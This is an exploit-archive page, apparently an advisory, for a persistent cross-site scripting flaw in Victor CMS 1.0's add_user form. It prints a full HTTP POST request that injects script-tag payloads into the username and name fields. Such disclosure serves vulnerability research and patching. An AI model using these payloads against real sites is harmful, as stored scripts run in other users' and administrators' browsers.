Victor CMS 1.0 Cross Site Scripting

Victor CMS 1.0 Cross Site Scripting: Posted May 25, 2020; Authored by Nitya Nand; Victor CMS version 1.0 suffers from an add_user persistent cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | af2d44af85919ce3ff7507d9ddeb9effeb9185aebb9e00c04d9f22a22b331924; Download | Favorite | View

Victor CMS 1.0 Cross Site Scripting

# Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
# Google Dork: N/A 
# Date: 2020-05-23 
# Exploit Author: Nitya Nand 
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite 
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip 
# Version: 1.0 
# Tested on: Linux 
# CVE : N/A


Description: The POST parameter 'user_name', 'user_firstname', 'user_lastname' is vulnerable to persistent cross site scripting Payload: <script>alert(1)</script>
POST /phpmaster/admin/users.php?source=add_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpmaster/admin/users.php?source=add_user
Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428
Content-Length: 417375
Connection: close
Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb
Upgrade-Insecure-Requests: 1

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_name"
"><script>alert(1)</script>

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_firstname"
"><script>alert(2)</script>

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_lastname"
"><script>alert(3)</script>

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_image"; filename="9400.jpg"
Content-Type: image/jpeg

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_role"
User

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_email"
abc@gmail.com

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_password"
1234

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="create_user"

Add User
-----------------------------515906178311115682892435428--

Top Authors In Last 30 Days

Red Hat 286 files
indoushka 161 files
Jay Turla 150 files
Ubuntu 71 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,128)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,774)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,823)
UNIX (9,453)
UnixWare (188)
Windows (6,765)
Other

Victor CMS 1.0 Cross Site Scripting

Victor CMS 1.0 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Victor CMS 1.0 Cross Site Scripting

Share This

Victor CMS 1.0 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems